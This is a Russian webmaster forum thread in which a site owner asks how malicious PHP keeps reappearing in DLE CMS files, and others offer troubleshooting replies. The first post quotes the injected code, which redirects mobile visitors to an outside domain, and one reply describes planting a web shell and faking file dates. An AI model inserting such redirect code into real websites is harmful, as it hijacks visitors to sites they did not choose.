X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость (

| Вход | Регистрация )

Открыть тему
Тема закрыта
> Вредоносный код на Dle
ecotraid
ecotraid
Topic Starter сообщение 10.2.2013, 15:33; Ответить: ecotraid
Сообщение #1


Здравствуйте! С недавнего времени на мои сайты на разных хостингах начал прописываться код в следующих файлах: /index.php, /engine/init.php, /engine/engine.php, /engine/data/config.php и /language/Russian/website.lng следующего содержания:
$iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");
$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");
$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");
$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");
if ($iphone || $android || $palmpre || $ipod || $berry === true) {
    header('Location: http://statuses.ws/');
}


Доступ по FTP закрыл, пароли менял, доступ в isp manager по статичному ip. Но все равно через несколько часов появляется!
Перестал появлятся когда поставил на эти файлы права 444 .

Кто знает как и где искать уязвимость? Сайты на VDS.
Спасибо.
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Agriiii
Agriiii
сообщение 10.2.2013, 15:45; Ответить: Agriiii
Сообщение #2


Если нет врага снаружи - то ищи его внутри. Если файлы ты закрыл - значит бяка изнутри их портит. Соседняя тема про JS говорит, может они заражены.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
ecotraid
ecotraid
Topic Starter сообщение 10.2.2013, 16:44; Ответить: ecotraid
Сообщение #3


Сейчас просмотрел все файлы на дату изменения - ничего, все кроме этих менялись еще полгода назад. Что интересно сайты на разных VDS (3) - наверно все таки через комп как то. Стоит KIS 2013 лицензия.

Вот вроде бы решение, кому интересно: взлом-dle-загрузкой-аватара-с-вредоносны

Блин, оказывается это массовый взлом DLE ...

Сообщение отредактировал ecotraid - 10.2.2013, 21:03
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
g00dboy
g00dboy
сообщение 9.3.2013, 0:53; Ответить: g00dboy
Сообщение #4


Сейчас просмотрел все файлы на дату изменения - ничего, все кроме этих менялись еще полгода назад.

залил шелл и поменял дату изменения = профит


Что интересно сайты на разных VDS (3) - наверно все таки через комп как то. Стоит KIS 2013 лицензия.

один взломали и получили доступ ко всей ФС
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
trustreg_mw
trustreg_mw
сообщение 14.3.2013, 3:22; Ответить: trustreg_mw
Сообщение #5


Проверь JS файлы. Наверное шаблон паблик..
Такое часто и у меня бывает ))

Замечание модератора:
Эта тема была закрыта автоматически ввиду отсутствия активности в ней на протяжении 100+ дней.
Если Вы считаете ее актуальной и хотите оставить сообщение, то воспользуйтесь кнопкой
или обратитесь к любому из модераторов.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) DLE xProtect
2 xoopw 5977 15.1.2024, 21:06
автор: Diana_Wesley
Открытая тема (нет новых ответов) Обновить сайт на CMS DLE
1 Sawich 1661 2.9.2023, 10:10
автор: WoWeb
Открытая тема (нет новых ответов) Изготовление красивых сайтов на DLE под ключ | Доступные цены
от 2000 руб.
1 Admiral_ukr 1598 20.11.2022, 10:08
автор: Webmaster24
Открытая тема (нет новых ответов) Ищу спеца по DLE вылечить сайт
4 Reactive 2639 22.10.2022, 9:01
автор: Fozik77
Открытая тема (нет новых ответов) требуется перенос с Dle на wordpres
нужен человек для переноса движка
5 Юрий82 1943 30.7.2022, 18:02
автор: Klerik84


 



RSS Текстовая версия Сейчас: 19.4.2024, 11:19
Дизайн